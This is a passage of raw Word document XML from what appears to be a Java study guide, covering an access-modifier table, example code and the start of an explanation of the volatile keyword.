          <w:p w14:paraId="256C3224" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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ccess Modifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42CC5789" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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ame Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3446EF0C" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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ame Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204D75C1" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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bclass (Same Package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56AB3126" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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bclass (Different Package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="008955F3" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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ther Classes (Different Package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w14:paraId="25FEDFF7" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0251135E" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B60A305" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="455B0346" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F995E62" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49C6BA28" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E0613A" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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r>
      <w:tr w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w14:paraId="7BAF4EFB" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE2BDCE" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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ivate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E984EB8" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7410BC3C" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4112505E" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A208AD" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4133CF95" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w14:paraId="045A1206" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F75FACF" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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otected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2381FC" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393E6F86" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B492C64" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3138C176" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69628A21" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w14:paraId="72485DA8" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E72113A" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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fault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490B9584" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C73D2AD" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62661C00" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="024D0E16" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61220C8D" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D3DDE1B" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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to Use Each Access Modifier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E9730" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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blic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use it when you want to make the member accessible from anywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787ADD0F" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Private</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use it to restrict access to the member from outside the class. This is generally used for encapsulating internal details of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F7360" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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otected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use it when you want to allow subclasses to access a member, but still want to keep it hidden from other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6079E524" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ault</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use it when you want to restrict access to classes within the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5889EB" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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 Usage of All Access Modifiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD431E" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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A64BF53" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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publicVa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Accessible from anywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C9C6F" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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privateVa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Accessible only within this class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA1A87" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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otecte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protectedVa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Accessible within the same package and subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66387C77" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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defaultVa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Accessible only within the same package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BCFC1" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DCF85" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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publicMetho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87EE1D4" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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ublic method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA6AEB" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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2D4869F" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3D6603" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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privateMetho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47F82A4" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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rivate method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3A9AA" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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F50C1A9" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822679C" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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otecte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protectedMetho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AED7ED9" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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rotected method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742826FE" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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36CC826" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47269B" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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defaultMetho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7A0E91E" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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Default method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631BF173" w14:textId="77777777" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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D0A7933" w14:textId="26555993" w:rsidR="004A0C85" w:rsidRPr="00CE4B9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7E9CCCCF" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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606A1ACE" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> play a crucial role in controlling the visibility of members in Java. Choosing the right modifier helps with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encapsulation</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data hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is important to select the appropriate level of access to prevent unauthorized access and maintain the integrity of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063041FD" w14:textId="0DF0FDE8" w:rsidR="000B4C89" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000B4C8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708D7F">
          <v:rect id="_x0000_i1164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B39E939" w14:textId="0D2EE54F" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="0004562A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc196307520"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is volatile in java? Where can we use it</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="74B966DA" w14:textId="00599C7D" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In Java, the volatile keyword is used to indicate that a variable's value will be modified by multiple threads. A volatile variable in Java ensures that the most up-to-date value of the variable is always visible to all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ABA8EB" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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olatile Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a variable is declared as volatile, it tells the Java Virtual Machine (JVM) that the value of the variable may be changed by multiple threads and that it should always fetch the latest value from the main memory rather than relying on local thread caches (which might not have the most recent value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BEC40" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Visibility Guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The volatile keyword provides a guarantee that updates made to a variable by one thread will be visible to all other threads. Without volatile, thread-local caches might prevent changes made by one thread from being visible to other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30234BE3" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JVM will not cache the value of a volatile variable in a thread's local memory (i.e., CPU cache). It ensures that each read or write operation is directly performed on the main memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552307E0" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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haracteristics of volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1EFFF" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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isibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes made to a volatile variable by one thread are immediately visible to other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90D863" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: volatile guarantees </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
